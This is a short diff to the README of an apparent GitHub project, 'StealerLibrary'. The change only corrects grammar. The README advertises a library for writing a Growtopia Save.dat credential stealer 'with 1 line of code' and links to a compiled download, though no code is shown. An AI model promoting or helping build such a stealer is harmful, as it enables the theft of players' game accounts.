1i8/Growtopia-Stealer-Library/README.md

 # StealerLibrary
-Growtopia (Save.dat) Stealer Library that let you to write a stealer with 1 line of code.
+Growtopia (Save.dat) Stealer Library that allows you to write a stealer with 1 line of code.
 #### ⭐ If you like the project, feel free to star the project ⭐

 ## Compiled Version: [Download](https://github.com/extatent/StealerLibrary/releases/)